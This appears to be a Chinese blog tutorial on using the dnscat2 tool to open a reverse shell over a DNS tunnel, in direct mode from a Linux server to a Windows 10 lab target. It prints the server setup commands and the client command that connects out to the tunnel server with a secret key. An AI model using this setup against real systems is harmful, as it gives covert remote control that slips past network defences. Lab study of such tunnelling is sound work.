使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
CYRUS_STUDIO3 小时前
用 Frida 控制 Android 线程:kill 命令、挂起与恢复全解析
android·linux·逆向
熊猫李5 小时前
rootfs-根文件系统详解
linux
chen9455 小时前
mysql 3节点mgr集群部署
运维·后端
LH_R6 小时前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
dessler7 小时前
Hadoop HDFS-高可用集群部署
linux·运维·hdfs
泽泽爱旅行7 小时前
awk 语法解析-前端学习
linux·前端
少妇的美梦1 天前
logstash教程
运维
chen9451 天前
k8s集群部署vector日志采集器
运维
chen9451 天前
aws ec2部署harbor,使用s3存储
运维
轻松Ai享生活1 天前
5 节课深入学习Linux Cgroups
linux